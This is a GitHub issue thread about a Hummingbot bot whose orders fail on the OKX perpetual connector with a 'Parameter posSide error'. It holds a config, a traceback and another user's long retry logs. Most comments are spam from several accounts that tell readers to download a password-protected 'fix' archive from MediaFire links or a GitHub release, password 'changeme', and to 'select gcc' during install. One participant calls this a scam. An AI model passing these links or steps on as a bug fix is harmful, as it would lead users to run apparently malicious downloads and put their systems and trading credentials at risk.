### ISSUE TITLE
OKX Perp connector - DirectionalTradingController - Error submitting order: Parameter posSide error 

### ISSUE THREAD

**Issue by PanzerKunst** [hummingbot/hummingbot#7185]
### Describe the bug

Created and deployed a bot in the Dashboard, using directional strategy "Bollinger V1". Orders fail using the "okx_perpetual" connector, but the exact same bot connecting to "kucoin_perpetual" works fine.

### Steps to reproduce

1. In the Dashboard, create a new "Bollinger V1" configuration, with connector "okx_perpetual". Example resulting configuration:
```
bb_length: 10
bb_long_threshold: 0.0
bb_short_threshold: 1.0
bb_std: 2.0
candles_connector: okx
candles_trading_pair: AAVE-USDT
connector_name: okx_perpetual
controller_name: bollinger_v1
controller_type: directional_trading
cooldown_time: 3600.0
id: bollinger-okxperp-aave_0.3
interval: 1m
leverage: 10
max_executors_per_side: 5
position_mode: HEDGE
stop_loss: 0.05
take_profit: 0.02
take_profit_order_type: 2
time_limit: 43200
total_amount_quote: 1000
trading_pair: AAVE-USDT
trailing_stop:
  activation_price: 0.0
  trailing_delta: 0.002
```

2. Deploy the bot

3. Logs indicate errors when trying to make orders `Error submitting order: Parameter posSide error `:
```
2024-08-26 06:50:59,153 - 15 - hummingbot.connector.derivative.okx_perpetual.okx_perpetual_derivative.OkxPerpetualDerivative - NETWORK - Error submitting buy MARKET order to Okx_perpetual for 1.4 AAVE-USDT 134.825.
Traceback (most recent call last):
  File "/home/hummingbot/hummingbot/connector/exchange_py_base.py", line 452, in _create_order
    await self._place_order_and_process_update(order=order, **kwargs,)
  File "/home/hummingbot/hummingbot/connector/exchange_py_base.py", line 469, in _place_order_and_process_update
    exchange_order_id, update_timestamp = await self._place_order(
  File "/home/hummingbot/hummingbot/connector/derivative/okx_perpetual/okx_perpetual_derivative.py", line 275, in _place_order
    raise IOError(f"Error submitting order {order_id}: {data['sMsg']}")
OSError: Error submitting order 93027a12dac34fBCBAEUT2c00f35f4a4: Parameter posSide error 
2024-08-26 06:50:59,154 - 15 - hummingbot.connector.derivative.okx_perpetual.okx_perpetual_derivative.OkxPerpetualDerivative - WARNING - Failed to submit BUY order to Okx_perpetual. Check API key and network connection.
2024-08-26 06:50:59,157 - 15 - hummingbot.strategy_v2.executors.position_executor.position_executor - ERROR - Open order failed. Retrying 1/10
```

### Release version

2.0.0

### Type of installation

Docker

### Attach required files

[logs_bot2-2024.08.26_06.48.log](https://github.com/user-attachments/files/16745443/logs_bot2-2024.08.26_06.48.log)

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by nikspz** [comment]
> to fix your trouble try download this fix, i see it in another issue,

This is scam

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahauimix** [comment]
Hey! I'm having the same problem:

1724876950.8103745 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 4/10

1724876951.829567 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 5/10

1724876952.828571 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 6/10

1724876953.8616073 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 7/10

1724876954.886156 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 8/10

1724876955.9219408 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 9/10

1724876956.9102545 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 10/10

1724876958.0536845 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 11/10

1724876960.064312 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 1/10

1724876961.0617769 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 2/10

1724876962.0991247 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 3/10

1724876963.1263366 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 4/10

1724876964.1276085 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 5/10

1724876965.1630726 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 6/10

1724876966.1991255 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 7/10

1724876967.207113 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 8/10

1724876968.125177 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 9/10

1724876969.1387868 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 10/10

1724876970.1557565 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 11/10

1724876972.2368486 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 1/10

1724876973.223018 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 2/10

1724876974.3012884 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 3/10

1724876975.3013601 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 4/10

1724876976.3230824 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 5/10

1724876977.4921827 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 6/10

1724876978.4655542 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 7/10

1724876979.4829998 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 8/10

1724876980.5148556 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 9/10

1724876981.5206554 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 10/10

1724876982.542976 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 11/10

1724876984.576173 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 1/10

1724876985.6023707 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 2/10

1724876986.6132705 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 3/10

1724876987.6417277 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 4/10

1724876988.6404784 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 5/10

1724876989.6812901 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 6/10

1724876990.6820097 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 7/10

1724876991.687401 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 8/10

1724876992.7343557 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 9/10

1724876993.7428308 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 10/10

1724876994.750551 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 11/10

1724876996.7940304 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 1/10

1724876997.8018322 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 2/10

1724876998.8409648 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 3/10

1724876999.8803973 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 4/10

1724877000.9639716 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 5/10

1724877003.0979261 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 6/10

1724877003.969887 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 7/10

1724877004.9713998 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 8/10

1724877005.998839 - hummingbot.strategy_v2.executors.position_executor.position_executor: Open order failed. Retrying 9/10

**Comment by ahauimix** [comment]
@PanzerKunst, hey mate. Please let me know if you have resolved this, and how. Thanks.

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
